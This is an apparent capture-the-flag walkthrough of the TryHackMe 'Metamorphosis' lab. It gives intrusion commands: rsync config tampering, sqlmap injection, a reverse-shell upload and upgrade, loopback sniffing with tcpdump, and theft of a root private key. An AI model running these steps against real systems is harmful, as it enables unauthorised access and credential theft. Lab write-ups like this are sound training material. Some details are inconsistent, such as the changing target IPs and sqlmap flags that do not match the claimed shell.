Metamorphosis

https://tryhackme.com/room/metamorphosis

User flag

Let's start with an nmap scan.

We see smb ports are open. After a quick enumeration we see we can't access to the folders.

Let's move to the rsync port. With the following command we can see if there's any shared folder. 

rsync -rdt rsync://10.10.133.232:873

We see we can access the Conf folder, let's download it to our machine.

rsync -av rsync://10.10.133.232:873/Conf .

Looking around the files we find nothing interesting (yet). Head into port 80.

We found a default apache2 website, maybe there's any hidden folder there.

Going to the /admin folder we see we got no access.

If we check the source code we see we could access it in a development enviroment.

Earlier we found a webapp.ini file pointing to prod. We can change the enviroment and upload it using rsync so we can access the admin folder.

rsync -av webapp.ini  rsync://10.10.133.232/Conf

Now we can see it. Let's test the query.

By the tags of the room we guess there's a SQLi at this point. Let's see if we're right using sqlmap.

It's vulnerable. We can try to get a SHELL with sqlmap

sqlmap -u 10.10.52.64/admin/config.php -data=username=test --is-dba --current-user

We are in. Let's grab the flag

Now we can upgrade the shell. Let's start a python http server so we can download a php rev shell in our victim machine.

Now we have to open the web browser and go to the following path to fire up the rev shell (Don't forget to start a listener):

Nice. If we have to introduce these commands to get a nice looking shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg

Root flag

Again, if we check the room tags on tryhack me we see a "sniff" tag. So let's sniff on the network and see if we get something interesting.

tcpdump -i lo -w sniff.pcap -v

We have to transfer the pcap file to our machine.

Let's fire up wireshark, take a look and follow the TCP Stream.

Interesting. There's a private key.

Let's copy the private key and try to access with root with it.

PreviousCold VVarsNextSweettooth Inc.

Last updated

Was this helpful?